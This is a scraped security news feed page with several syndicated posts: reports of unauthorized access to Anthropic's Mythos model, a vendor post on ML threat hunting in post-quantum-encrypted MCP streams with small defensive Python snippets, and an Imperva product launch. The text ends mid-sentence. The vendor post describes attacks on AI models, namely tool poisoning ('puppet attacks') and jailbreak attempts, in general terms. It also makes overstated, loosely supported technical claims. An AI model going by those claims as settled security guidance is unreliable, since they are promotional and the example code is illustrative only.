addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/what-we-mean-by-procedures-and-why-precision-matters/" data-a2a-title="What We Mean by Procedures (And Why Precision Matters)"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhat-we-mean-by-procedures-and-why-precision-matters%2F&amp;linkname=What%20We%20Mean%20by%20Procedures%20%28And%20Why%20Precision%20Matters%29" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.tidalcyber.com/blog">Tidal Cyber Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tidal Cyber">Tidal Cyber</a>. Read the original post at: <a href="https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters">https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters</a> </p>

SYDNEY, April 22 : The central banks of Australia and New Zealand said on Wednesday they were monitoring the release of Anthropic's advanced Mythos artificial intelligence model, joining authorities … [+1649 chars]

A small group of unauthorized users has accessed Anthropic's new Mythos AI model, Bloomberg News reported on Tuesday, citing documentation and a person familiar with the matter.A handful of users in … [+903 chars]

Skip to comments. Anthropic's Mythos model accessed by unauthorized users, Bloomberg News reports yahoo ^ | Tue, April 21, 2026 at 2:49 PM PDT | Reuters Posted on 04/21/2026 7:31:02 PM PDT by … [+1188 chars]

April 21 : Japan's Finance Minister Satsuki Katayama plans to meet the country's biggest banks and other financial institutions as early as this week to discuss Anthropic PBC's latest AI model Mythos… [+590 chars]

<p>The post <a href="https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems">Agentic Cloud Security: Fixing AI’s 4 Biggest Gaps</a> appeared first on <a href="https://www.uptycs.com/blog">Uptycs Blog</a>.</p><div class="hs-featured-image-wrapper"> <a href="https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.uptycs.com/hubfs/Blog%20SPI_Solving%20security%20AI-s%204%20biggest%20problems.png" alt="Agentic Cloud Security: Fixing AI’s 4 Biggest Gaps" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p><a></a> </p><p>Take an armful of customer data, shove it into an off-the-shelf large language model, and ask Claude for a system prompt that summarizes alerts and generates remediation steps. Congratulations, you’ve not only learned the entire history of security AI product releases over the past three years, but also how they were built.</p><p><img decoding="async" src="https://track.hubspot.com/__ptq.gif?a=2617658&amp;k=14&amp;r=https%3A%2F%2Fwww.uptycs.com%2Fblog%2Fagentic-cloud-security-solving-security-ai-biggest-problems&amp;bu=https%253A%252F%252Fwww.uptycs.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/agentic-cloud-security-fixing-ais-4-biggest-gaps/" data-a2a-title="Agentic Cloud Security: Fixing AI’s 4 Biggest Gaps"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-cloud-security-fixing-ais-4-biggest-gaps%2F&amp;linkname=Agentic%20Cloud%20Security%3A%20Fixing%20AI%E2%80%99s%204%20Biggest%20Gaps" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-cloud-security-fixing-ais-4-biggest-gaps%2F&amp;linkname=Agentic%20Cloud%20Security%3A%20Fixing%20AI%E2%80%99s%204%20Biggest%20Gaps" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-cloud-security-fixing-ais-4-biggest-gaps%2F&amp;linkname=Agentic%20Cloud%20Security%3A%20Fixing%20AI%E2%80%99s%204%20Biggest%20Gaps" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-cloud-security-fixing-ais-4-biggest-gaps%2F&amp;linkname=Agentic%20Cloud%20Security%3A%20Fixing%20AI%E2%80%99s%204%20Biggest%20Gaps" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-cloud-security-fixing-ais-4-biggest-gaps%2F&amp;linkname=Agentic%20Cloud%20Security%3A%20Fixing%20AI%E2%80%99s%204%20Biggest%20Gaps" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.uptycs.com/blog">Uptycs Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Umesh Sirsiwal">Umesh Sirsiwal</a>. Read the original post at: <a href="https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems">https://www.uptycs.com/blog/agentic-cloud-security-solving-security-ai-biggest-problems</a> </p>

<p>The post <a href="https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams">Automated ML-driven threat hunting in post-quantum encrypted MCP streams</a> appeared first on <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a>.</p><h2>The new frontier of mcp security and quantum risks</h2><p>Imagine if you finally locked your front door with a key that literally cannot be copied, but then you realize you can't see through the peephole anymore to see who is knocking. That is exactly what happens when we switch to post-quantum cryptography (pqc) for our Model Context Protocol (mcp) streams. For those who aren't deep in the weeds, mcp is an open standard that lets ai models connect to external data sources and tools. We get amazing privacy with it, but we lose the ability to actually see what the ai is doing.</p><p>Traditional signature-based DPI is basically dead when it comes to quantum-resistant tunnels. (<a href="https://www.ias.edu/security/deep-packet-inspection-dead-and-heres-why">Deep packet inspection is dead, and here's why | Security</a>) If you try to break the encryption to look for threats, the latency hit is massive. I've seen setups where the lag makes the ai basically unusable for real-time tasks. Behavioral/ML-driven traffic analysis is the successor here, because it doesn't need to crack the code to see if something is fishy.</p><ul> <li><strong>The visibility gap</strong>: While some claim pqc like Kyber makes inspection impossible, the reality is that it just makes it incredibly difficult for middleboxes to sniff traffic without being a verified endpoint. In a retail setting, this means a compromised mcp server could be leaking customer data, and your firewall wouldn't have a clue because it can't "man-in-the-middle" the connection easily.</li> <li><strong>Latency nightmares</strong>: Decrypting and re-encrypting pqc traffic at the edge adds milliseconds that stack up fast. For high-frequency finance apps, that delay is a deal-breaker.</li> <li><strong>Metadata is king</strong>: Since the payload is encrypted and its contents are hidden, we have to teach ml models to look at "the shape" of the traffic—timing, packet sizes, and bursts—to find bad actors.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>The mcp creates a huge new playground for hackers. It isn't just about stealing data; it is about "puppet attacks." This is where a malicious resource—like a poisoned healthcare database—tricks the model into executing commands it shouldn't. ML detects these puppet attacks by identifying unusual sequences of tool calls that deviate from how the model usually acts. If it suddenly starts calling a "delete" function after a "read" request in a way it never has before, the ml flags the anomaly.</p><p>According to a <a href="https://www.ibm.com/reports/threat-intelligence">2024 report by IBM</a>, the average cost of a data breach is hitting record highs. If a tool is poisoned in a dev environment, the ai might start "hallucinating" malicious code directly into your production repo.</p><p>Honestly, we're moving toward a world where the infrastructure is so complex that humans can't watch the gates anymore. We need ml that's as smart as the ai it's protecting.</p><h2>Implementing automated ml for encrypted threat hunting</h2><p>So, we’ve hidden our mcp traffic inside these beefy quantum-resistant tunnels, which is great for privacy but sucks for visibility. It’s like trying to guess what someone is cooking just by listening to the clinking of their pans—you can't see the ingredients, but the rhythm tells a story.</p><p>To get around this "blind spot," we’re seeing a shift toward p2p (peer-to-peer) connectivity for mcp flows. Using tools like Gopher Security—an identity-based security platform—helps because they don't just dump data into a black hole; they create a 4D security framework that looks at the context around the encrypted stream.</p><p>Instead of trying to crack the pqc—which is basically impossible anyway—this approach focuses on the behavior of the mcp servers themselves. If a server in a retail environment suddenly starts sending huge bursts of data to an unknown IP at 3 AM, the ml doesn't need to read the packets to know something is wrong.</p><ul> <li><strong>Zero-day spotting</strong>: By monitoring how an ai model usually talks to its tools, Gopher's framework can flag when a "handshake" looks slightly off.</li> <li><strong>P2P resilience</strong>: Because the data flows directly between nodes rather than through a central hub, there is less "noise" for the ml to sift through.</li> <li><strong>Visibility without decryption</strong>: You get the metadata needed for training without ever touching the actual keys.</li> </ul><p>Since the payload is encrypted and its contents are hidden, we have to get creative with "feature engineering." We look at the timing between packets, the exact size of the chunks being sent, and which way the data is flowing.</p><p>For example, a "normal" model-to-tool handshake in a finance app has a very specific cadence. If we suddenly see a massive outbound flow after a tiny inbound request, that's a huge red flag for data exfiltration.</p><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-2.svg" alt="Diagram 2"></p><p>According to a 2023 study by Palo Alto Networks, over 50% of security operations center (soc) analysts are overwhelmed by the sheer volume of alerts, which is why automating this ml "hunting" is so critical. </p><p>Here is a quick snippet of how a security engineer might start grouping these features to look for high-entropy payloads or weird timing:</p><pre><code class="language-python">import math def analyze_mcp_behavior(packet_sizes, intervals): # Calculate entropy of packet sizes to find hidden data entropy = -sum((p/sum(packet_sizes)) * math.log2(p/sum(packet_sizes)) for p in packet_sizes if p &gt; 0) # Check for jitter/timing anomalies avg_interval = sum(intervals) / len(intervals) if entropy &gt; 7.5 or avg_interval &lt; 0.001: trigger_behavioral_alert("Potential exfiltration or puppet attack detected") return "flow_analyzed" </code></pre><p>Honestly, the goal is to make the security as smart as the ai it’s watching. If we don't, we're just building faster cars with no brakes.</p><h2>Real-time detection and policy enforcement</h2><p>Finding out someone is trying to mess with your ai model is one thing, but actually stopping them in mid-air without crashing the whole system? That’s the real trick. </p><p>When you're dealing with mcp streams wrapped in pqc, you can't just pull the plug on every suspicious packet or you'll break the very tools the ai needs to function. We need a way to turn those ml insights into "surgical" blocks.</p><ul> <li><strong>Dynamic permission shifts</strong>: Based on real-time risk, you can strip away "write" access and leave only "read" permissions. </li> <li><strong>Prompt injection shields</strong>: By looking at the entropy of the parameters being passed to mcp tools, we can stop "jailbreak" attempts. </li> <li><strong>Environmental checks</strong>: If a dev is hitting a production mcp server from a device with an outdated kernel, the policy engine can block the connection.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>If a tool gets compromised—like a retail inventory api that starts acting like a command-and-control server—you need to move fast. Manual intervention is too slow when ai is chatting at 100 tokens per second. </p><p>We use soar (security orchestration, automation, and response) playbooks that trigger the moment the ml flags a "critical" anomaly. According to research by Mandiant, the speed of cloud-native exploits means human response times are no longer sufficient, making automated isolation the only viable path.</p><pre><code class="language-python">def enforce_mcp_policy(risk_score, tool_id): if risk_score &gt; 0.9: quarantine_resource(tool_id) log_event("CRITICAL: Tool isolated due to anomaly") elif risk_score &gt; 0.6: apply_read_only_mode(tool_id) log_event("WARNING: Restricted access applied") </code></pre><h2>Future-proofing the ai security stack</h2><p>So, we’ve built this high-speed, quantum-proof monster, but how do we keep it from falling apart when the traffic hits a million requests per second? It is one thing to secure a lab environment, it’s a whole different beast when you are running mcp streams across a global retail or finance network.</p><p>When you’re pushing that much data through pqc tunnels, your standard cpu is going to scream for mercy. Most big players are moving toward hardware acceleration—think smartNICs or dedicated fpga cards—to offload the encryption. </p><ul> <li><strong>Hardware offloading</strong>: Using dedicated chips for pqc means your ai doesn't stutter every time it calls a tool.</li> <li><strong>Global mesh</strong>: Instead of a central bottleneck, use a peer-to-peer mesh where security policies are synced across every node.</li> <li><strong>API complexity</strong>: Your security stack has to automatically "learn" the schema of every new tool added to the mcp.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/685d00d4cb08ab5f5934b924/690c83ae1ca595b8c6f91e0f/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>Honestly, the lawyers and auditors are usually the ones most stressed about this stuff. How do you prove you’re following gdpr or soc 2 when you’re using encryption that literally nobody can break? It creates a weird paradox for governance.</p><p>You need automated compliance management that logs the <em>fact</em> that a security check happened, even if it can't see the raw data. As mentioned earlier, we have to rely on metadata and "the shape" of the traffic to prove to auditors that we’re stopping data leaks. </p><ul> <li><strong>Proof of inspection</strong>: Logs should show that an ml model scanned the packet timing and size.</li> <li><strong>Governance at scale</strong>: Use "security as code" to push out new quantum-resistant policies to every ai agent in your fleet at once.</li> <li><strong>Future-proofing</strong>: Start transitioning your root certificates to pqc now, because "store now, decrypt later" attacks are a real thing hackers are doing today.</li> </ul><p>The next decade of ai infrastructure is going to be messy, but if we bake this quantum-resistant security into the mcp stack now, we won't be scrambling when the first real quantum computers start knocking on our doors. It’s about building a stack that’s fast, invisible, and smart enough to watch its own back.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/automated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams/" data-a2a-title="Automated ML-driven threat hunting in post-quantum encrypted MCP streams"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fautomated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams%2F&amp;linkname=Automated%20ML-driven%20threat%20hunting%20in%20post-quantum%20encrypted%20MCP%20streams" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fautomated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams%2F&amp;linkname=Automated%20ML-driven%20threat%20hunting%20in%20post-quantum%20encrypted%20MCP%20streams" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fautomated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams%2F&amp;linkname=Automated%20ML-driven%20threat%20hunting%20in%20post-quantum%20encrypted%20MCP%20streams" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fautomated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams%2F&amp;linkname=Automated%20ML-driven%20threat%20hunting%20in%20post-quantum%20encrypted%20MCP%20streams" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fautomated-ml-driven-threat-hunting-in-post-quantum-encrypted-mcp-streams%2F&amp;linkname=Automated%20ML-driven%20threat%20hunting%20in%20post-quantum%20encrypted%20MCP%20streams" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security&amp;#039;s Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams">https://www.gopher.security/blog/automated-ml-driven-threat-hunting-post-quantum-encrypted-mcp-streams</a> </p>

<p>In today’s dynamic digital environment, the pressure to innovate has never been greater. Development teams are pushing for native cloud tools to maximize performance and cost-efficiency, while security teams require best-of-breed, enterprise-grade protection to defend against an ever-evolving threat landscape. This often creates a point of friction, forcing organizations into a difficult trade-off: sacrifice performance for security, or accept weaker protections for the sake of speed.</p><p>To resolve this challenge, Thales Imperva is collaborating with Google Cloud to deliver a solution that helps bridge this gap. We are proud to introduce Imperva for Google Cloud (IGC), an integrated security solution that offers the best of both worlds: enterprise-grade application security with the cloud-native performance you expect from Google Cloud.</p><h2><strong>Imperva for Google Cloud: A Holistic, Integrated Solution</strong></h2><p>Imperva for Google Cloud is not just another security layer; it is a fully managed, best-in-class Web Application and API Protection (WAAP) solution built directly into the fabric of Google Cloud. This integration, available now on Google Cloud Marketplace,   provides robust protection without disrupting your existing infrastructure or workflows.</p><ul> <li><strong>Cloud-Native Performance Without Compromise:</strong> Imperva for Google Cloud uses Google Cloud’s native Service Extension and Private Service Connect to inspect traffic within the Google Cloud network. This means all traffic analysis happens without your data ever leaving Google Cloud infrastructure, preserving optimal latency, performance, and data residency.</li> <li><strong>Quick Deployment:</strong> Forget complex re-architecture. Imperva for Google Cloud can be deployed quickly using familiar tools like Terraform, Google Cloud CLI (gCloud CLI), or the Google Cloud console UI. There are no disruptive DNS, SSL, or network routing changes required, allowing you to achieve production-ready protection almost immediately.</li> <li><strong>Enterprise-Grade Protection Out of the Box:</strong> Imperva for Google Cloud is powered by Imperva’s industry-leading security engine, delivering comprehensive WAF, advanced API Security, and Account Bot Protection. Backed by 24/7 threat research, the Imperva solution provides near-zero false positives, with 97% of customers successfully using default policies and 95% running in blocking mode from day one. This dramatically reduces the operational overhead of constant rule tuning.</li> </ul><h2><strong>Real-World Impact: Securely Accelerating Your Business</strong></h2><p>By eliminating the trade-offs between security and performance, Imperva for Google Cloud helps organizations achieve key business outcomes:</p><ul> <li><strong>Accelerate Lift-and-Shift Migrations:</strong> Migrate workloads to Google Cloud confidently with security that adapts to your applications, not the other way around. Eliminate migration delays caused by complex security re-architecture.</li> <li><strong>Unleash DevOps-Friendly Security:</strong> Empower development teams to innovate at speed. IGC closes the security gaps in built-in tools without slowing down deployment velocity or requiring developers to become security experts.</li> <li><strong>Protect Modern Cloud-Native Applications:</strong> Secure your Kubernetes and microservices architectures with best-in-class defenses optimized for low-latency environments.</li> <li><strong>Achieve Unified Multi-Cloud Governance:</strong> Manage security for all your Imperva-protected environments from a single, unified dashboard, providing consistent policy management and visibility across your entire multi-cloud estate.</li> </ul><p><em>“Bringing Thales Imperva to Google Cloud Marketplace will help customers quickly deploy, manage, and grow the company’s integrated security solution on Google Cloud’s trusted, global infrastructure,” said Dai Vu, Managing Director, Marketplace &amp; ISV GTM Programs at Google Cloud. “Thales can now securely scale and support organizations that want to use its Imperva for Google Cloud solution to increase protection for their cloud-native applications, APIs, microservices and more.”</em></p><h2><strong>Join Us on the Journey to More Seamless Cloud Security</strong></h2><p>As we approach key industry events like our exclusive Executive Briefing Center (EBC) meeting in late March and Google Cloud Next 2026 in April, the conversation around integrated  security has never been more relevant. The launch of Imperva for Google Cloud marks a pivotal moment in our relationship with Google, providing a clear path for customers to secure their digital assets without compromise.</p><p><strong>Ready to secure your cloud-native applications?</strong></p><ul> <li><strong>Request a demo</strong>: Experience IGC in action at <a href="https://www.imperva.com/products/imperva-for-google-cloud/">Imperva for Google Cloud</a></li> <li><strong>Start your evaluation</strong>: Available now on <a href="https://console.cloud.google.com/marketplace/product/cpl-vpop-p-mktp-global-02/ias4gc?project=workflow-test-474814&amp;pli=1&amp;login=true&amp;ref=https:%2F%2Fstatics.teams.cdn.office.net%2F" rel="noopener">Google Cloud Marketplace</a></li> </ul><p>The post <a href="https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/">Enterprise-Grade Application Security, Cloud-Native Speed: Introducing Imperva for Google Cloud</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/" data-a2a-title="Enterprise-Grade Application Security, Cloud-Native Speed: Introducing Imperva for Google Cloud"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fenterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud%2F&amp;linkname=Enterprise-Grade%20Application%20Security%2C%20Cloud-Native%20Speed%3A%20Introducing%20Imperva%20for%20Google%20Cloud" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fenterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud%2F&amp;linkname=Enterprise-Grade%20Application%20Security%2C%20Cloud-Native%20Speed%3A%20Introducing%20Imperva%20for%20Google%20Cloud" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fenterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud%2F&amp;linkname=Enterprise-Grade%20Application%20Security%2C%20Cloud-Native%20Speed%3A%20Introducing%20Imperva%20for%20Google%20Cloud" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fenterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud%2F&amp;linkname=Enterprise-Grade%20Application%20Security%2C%20Cloud-Native%20Speed%3A%20Introducing%20Imperva%20for%20Google%20Cloud" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fenterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud%2F&amp;linkname=Enterprise-Grade%20Application%20Security%2C%20Cloud-Native%20Speed%3A%20Introducing%20Imperva%20for%20Google%20Cloud" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.imperva.com/blog/">Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Ido Mantsur">Ido Mantsur</a>. Read the original post at: <a href="https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/">https://www.imperva.com/blog/enterprise-grade-application-security-cloud-native-speed-introducing-imperva-for-google-cloud/</a> </p>

<p>A group of unauthorized users reportedly has gained access to Anthropic’s controversial Claude Mythos Preview AI frontier model despite the AI vendor’s efforts to keep it out of public hands by limiting the organizations that can use it.</p><p><a href="https://www.bloomberg.com/news/articles/2026-04-21/anthropic-s-mythos-model-is-being-accessed-by-unauthorized-users" target="_blank" rel="noopener">Bloomberg reported</a> that the unnamed group had tried multiple ways to gain access to the AI model since it was first announced earlier this month, and finally was able to get through via a third-party vendor. The users, who accessed Mythos on the day it was announced, are part of a Discord online forum group known to search for information about unreleased AI models.</p><p>According to the report, the group, using knowledge it had about a format Anthropic had used for other models, “made an education guess about [Mythos’] online location.” A person inside the group that Bloomberg communicated with told the news outlet that they were “interested in playing around with new models, not wreaking havoc with them.”</p><p>In a <a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" target="_blank" rel="noopener">statement</a> to TechCrunch, an Anthropic spokesperson said the company was investigating the claim of unauthorized access to Mythos through a third-party vendor, and that the company has not found indications that the group’s activities have effected its systems.</p><h3>Mythos’ Ongoing Ripple Effect</h3><p>Anthropic’s <a href="https://securityboulevard.com/2026/04/anthropic-unveils-restricted-ai-cyber-model-in-unprecedented-industry-alliance/" target="_blank" rel="noopener">announcement</a> of Mythos April 7 sent shockwaves through the cybersecurity industry. The vendor described a frontier model that is significantly better than any other developed at detecting and identifying software vulnerabilities, noting that in tests, Mythos was able to find a security flaw that had been present yet undetected for 27 years.</p><p>However, the model also is <a href="https://www.anthropic.com/glasswing" target="_blank" rel="noopener">very good at creating exploits</a> for the vulnerabilities, which convinced Anthropic executives to limit the release of Mythos to a select group of organizations that will use them to create stronger defenses as part of the AI vendor’s new <a href="https://red.anthropic.com/2026/mythos-preview/" target="_blank" rel="noopener">Project Glasswing</a>.</p><p>OpenAI a week later followed a similar path with the <a href="https://securityboulevard.com/2026/04/openai-follows-anthropic-in-limiting-access-to-its-cyber-focused-model/" target="_blank" rel="noopener">unveiling of GPT-5.4-Cyber</a>, a frontier model focused on cybersecurity that the vendor also designated for particular users, though granting access to more organizations and individuals than Anthropic.</p><p>The introduction of Mythos ignited debates about everything from cybersecurity as such autonomous AI models come into play to what organizations need to do to secure their IT environments to whether Mythos’ capabilities are unique.</p><h3>Speed is the Difference</h3><p>However, enterprises and their security teams need to pay attention, according to Brian Fox, co-founder and CTO of Sonatype, which provides a software supply chain management platform.</p><p>“If the early reporting is right, Mythos could be a watershed moment,” Fox said. “What is not new is the reality it is forcing people to confront. Beneath the AI framing sits the same software supply chain reality we have been discussing for years: dependencies, build pipelines, third-party software, and infrastructure remain the attack surface.”</p><p>Fox added that “what changed is speed. AI can now find and operationalize weaknesses across that stack faster than most organizations can inventory, prioritize, and patch them. What we are seeing in response to the Mythos news is many organizations coming to terms with a reality that has existed for a long time: they are not actually in control of their software supply chains.”</p><h3>Addressing the Threats</h3><p>Tech vendors are beginning to roll out offerings aimed at helping organizations deal with the cyber risks posed by such frontier models. IBM Consulting last week <a href="https://securityboulevard.com/2026/04/new-ibm-security-services-aim-to-counter-risks-of-frontier-ai-models/" target="_blank" rel="noopener">introduced IBM Autonomous Security</a>, a collection of specialized agents created to make enterprises’ often sprawling security stacks work a more unified and coordinated fashion and creating what the vendor called “a systemic defense” that is needed to address the autonomous and fast-moving threats from such models.</p><p>At the same time, IBM is offering a new service for assessing a company’s security weaknesses and responding to them.</p><p>Likewise, Palo Alto Networks launched <a href="https://www.paloaltonetworks.com/blog/2026/04/introducing-unit-42-frontier-ai-defense/" target="_blank" rel="noopener">Unit 42 Frontier AI Defense</a>, an offering that uses AI models to help organizations “identify and validate the exposures most likely to be chained into real attacks before attackers weaponize them,” with Sam Rubin, senior vice president of consulting and threat intelligence at Unit 42, writing that “frontier AI is changing what is possible for attackers. In the hands of defenders, it can become a decisive advantage.”</p><h3>What Publicly Available Models Can Do</h3><p>Mythos and GPT-5.4-Cyber have garnered much of the attention about the cybersecurity risks such frontier models represent. However, some security vendors wrote that they tested publicly available AI models and found that many of them came close to or matched Mythos’ ability to find and identify zero-day vulnerabilities.</p><p>Executives with startup Aisle, which offers an AI-native app security platform, <a href="https://aisle.com/blog/ai-cybersecurity-after-mythos-the-jagged-frontier" target="_blank" rel="noopener">wrote</a> that over the past year, they had built an AI system for discovering, validating, and patching zero-days in open source software. In tests, they “took the specific vulnerabilities Anthropic showcases in their 